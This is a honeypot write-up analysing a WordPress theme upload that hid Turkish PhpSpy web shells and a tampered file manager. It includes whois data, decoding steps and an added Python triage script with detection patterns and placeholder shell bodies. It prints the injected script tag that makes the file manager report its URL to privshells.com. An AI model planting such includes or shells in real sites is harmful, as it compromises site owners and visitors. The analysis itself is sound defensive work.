
95.10.253.55-2018-01-25a

flat theme - Turkish PhpSpy and a kinked file manager

A WordPress theme containing two instances of a Turkish-language PhpSpy web shell, and a webadmin.php file manager that phones home with its URL.

Origin

IP address

95.10.253.55 → 95.10.253.55.dynamic.ttnet.com.tr

95.10.253.55.dynamic.ttnet.com.tr doesn't exist in DNS

whois data:

NIC Handle		: tyh14-metu
Organization Name	: Turkticaret.Net Yazılım Hizmetleri Sanayi Ticaret A.Ş.
Address			: Uludag Universitesi Gorukle Kampusu
			  Ulutek Tek. Bol. Arge Binasi Yani Ek Bina Nilufer
			  Bursa,
			  Türkiye
Phone			: + 90-224-2248640
Fax			: + 90-224-2249520


inetnum:        95.10.236.0 - 95.10.255.255
netname:        TurkTelekom
descr:          TT ADSL-ttnet-ulus-dinamic
country:        tr
admin-c:        TTBA1-RIPE
tech-c:         TTBA1-RIPE
status:         ASSIGNED PA
mnt-by:         as9121-mnt

Download

The downloader used the theme upload feature of my WordPress honeypot. The downloader uploaded a file named flat.1.7.7 (2).zip, which appears to be a legitimate WordPress theme, except that 3 files in the Zip archive carry a different date from the rest: flat/404.php, flat/archive.php, flat/index.php.
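The mismatched-date observation is a cheap triage heuristic for theme and plugin uploads, so here is an added example (not code from the write-up) that applies it. It builds a small constructed theme archive in memory whose file names mirror the ones above but whose contents are placeholders, then reports files whose archive date differs from the majority and files that contain constructs typical of obfuscated shells (eval of a decoded blob, an external script include). The sample contents, dates and the pattern list are assumptions for illustration.

```python
import io
import re
import zipfile
from collections import Counter


def build_sample_zip() -> bytes:
    """Constructed sample archive: six 'legitimate' files with one build date and
    three later-dated files carrying placeholder shell-like content."""
    legit_time = (2016, 3, 14, 10, 0, 0)      # constructed: original theme build date
    tampered_time = (2018, 1, 24, 22, 30, 0)  # constructed: later modification
    files = {
        "flat/style.css": (legit_time, "/* Theme Name: Flat */"),
        "flat/functions.php": (legit_time, "<?php add_theme_support('title-tag');"),
        "flat/header.php": (legit_time, "<?php wp_head(); ?>"),
        "flat/footer.php": (legit_time, "<?php wp_footer(); ?>"),
        "flat/sidebar.php": (legit_time, "<?php dynamic_sidebar('sidebar-1'); ?>"),
        "flat/single.php": (legit_time, "<?php get_header(); the_post(); get_footer();"),
        # Placeholder bodies only; not the captured malware.
        "flat/404.php": (tampered_time, "<?php eval(gzinflate(base64_decode('PLACEHOLDER')));"),
        "flat/index.php": (tampered_time, "<?php eval(gzinflate(base64_decode('PLACEHOLDER')));"),
        "flat/archive.php": (tampered_time,
                             'echo "<SCRIPT SRC=http://privshells.com/blabla/per.js></SCRIPT>";'),
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, (ts, body) in files.items():
            info = zipfile.ZipInfo(name, date_time=ts)  # set the archive timestamp explicitly
            zf.writestr(info, body)
    return buf.getvalue()


# Assumed pattern list: constructs that are rare in a clean theme but common in
# packed web shells. Labels are reported in this order.
SUSPICIOUS = [
    (r"\beval\s*\(", "eval()"),
    (r"\b(gzinflate|gzuncompress|str_rot13)\s*\(", "gzinflate()/str_rot13() transform"),
    (r"\bbase64_decode\s*\(", "base64_decode()"),
    (r"<script[^>]+src\s*=\s*['\"]?https?://", "external script include"),
    (r"preg_replace\s*\(\s*['\"][^'\"]*/e['\"]", "preg_replace /e modifier"),
]


def timestamp_outliers(zf: zipfile.ZipFile) -> list:
    """Files whose (year, month, day) differs from the most common date in the archive."""
    dates = {i.filename: i.date_time[:3] for i in zf.infolist() if not i.is_dir()}
    common, _count = Counter(dates.values()).most_common(1)[0]
    return sorted(name for name, d in dates.items() if d != common)


def suspicious_files(zf: zipfile.ZipFile) -> dict:
    """Map of file name -> list of matched pattern labels, for script-bearing files only."""
    hits = {}
    for info in zf.infolist():
        if info.is_dir() or not info.filename.lower().endswith((".php", ".js", ".html")):
            continue
        text = zf.read(info).decode("utf-8", errors="replace")
        reasons = [label for pat, label in SUSPICIOUS if re.search(pat, text, re.I)]
        if reasons:
            hits[info.filename] = reasons
    return hits


def triage(zip_bytes: bytes) -> dict:
    """Run both checks without executing any of the archive's code."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return {"outliers": timestamp_outliers(zf), "suspicious": suspicious_files(zf)}


if __name__ == "__main__":
    report = triage(build_sample_zip())
    for name in report["outliers"]:
        print("date outlier:", name)
    for name, reasons in report["suspicious"].items():
        print("suspicious:", name, "->", ", ".join(reasons))
```

Both checks are purely static: nothing from the archive is evaluated, which is the point when the payload is an eval chain. The date check only works when the majority of files share the original build date, which is the usual case for a repackaged legitimate theme; a fully attacker-built archive would need the content check alone.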

Decoding

It turns out that index.php and 404.php have the same contents. Of the two, I chose to decode index.php.

  1. cp index.php dc1.php
  2. Hand-edit dc1.php to print instead of eval
  3. php dc1.php > dc2.php

archive.php is FOPO encoded. Use a FOPO deobfuscator on it.

  1. php ~/src/php/FOPO-PHP-Deobfuscator/ver.-0.22/deobfuscator.php archive.php > bc2.php
  2. Pretty-print bc2.php, yielding fb2.php

Analysis

dc2.php appears to be the final form of that code. It's the slightly modified, Turkish-language PhpSpy of archive.php. That would match the ISP and location of the IP address.

fb2.php is a hacked-up version of webadmin.php, a "simple web-based file browser". Not to worry, it's been kinked. Loading the HTML that fb2.php generates will cause your browser to load a JavaScript program:

echo "<SCRIPT SRC=http://privshells.com/blabla/per.js></SCRIPT>";

It looks like per.js will call http://privshells.com/blabla/per.php?url='+escape(location.href)+'. That is, it will tell a PHP program on privshells.com the URL of webadmin.php. Wow, these bottom-feeders just can't get enough of each other.

privshells.com → 185.85.75.98

185.85.75.98 → 185-85-75-99.datatr.com.tr

185.85.75.98 belongs to 185.85.75.0/24 (AS43260), apparently a Turkish ISP.